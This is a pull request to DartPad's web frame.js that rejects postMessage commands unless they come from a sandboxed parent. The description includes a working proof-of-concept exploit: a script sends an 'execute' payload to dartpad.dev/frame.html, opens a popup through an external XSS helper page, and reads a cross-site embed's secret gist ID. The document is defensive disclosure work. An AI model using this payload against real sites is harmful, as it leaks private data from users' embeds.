### PR TITLE
Enforce sandbox isolation to prevent information leaks

### DIFF
--- a/pkgs/dartpad_ui/web/frame.js
+++ b/pkgs/dartpad_ui/web/frame.js
@@ -20,7 +20,7 @@ function replaceJavaScript(value) {
 // Handles incoming messages.
 function messageHandler(e) {
   var obj = e.data;
-
+  if (window.origin !== 'null' || e.source !== window.parent) return;
   if (obj.command === 'execute') {
     // TODO: Switch to using engineInitializer.initializeEngine(config). See
     // https://docs.flutter.dev/development/platform-integration/web/initialization.


### PR DESCRIPTION
- [x] I’ve reviewed the contributor guide and applied the relevant portions to this PR.

Per https://github.com/dart-lang/dart-pad/wiki/Embedding-Guide websites can embed dart pad however  its currently possible to leak data contained in a sites embed since the sandbox is not isolated.

```js
// Please click, Opening a victim popup needs user activation
onclick = () => {

let frame = document.createElement('iframe');
frame.src = 'https://dartpad.dev/frame.html';
document.body.appendChild(frame);

payload = `
 // XSS running on the dartpad.dev origin (instead of null)
 let win = open('https://terjanq.me/xss.php?html=%3Ciframe%20src=%22https://dartpad.dev/?id=5c0e154dd50af4a9ac856908061291bc?theme=light%22%3E%3C/iframe%3E');
 setTimeout(() => {
  // Leak the secret gist ID of a cross-site embed
  alert('Leaked: ' + win[0].location.search);
 }, 2000);
`;

frame.onload = () => { frame.contentWindow.postMessage({command: 'execute', js: payload}, '*'); };

};
```

I'm new to this code base so please tell me if this is WAI or my fix is flawed.
In https://github.com/dart-lang/dart-pad/pull/2044 looks like it was decided not to allow for sandbox escapes of this kind.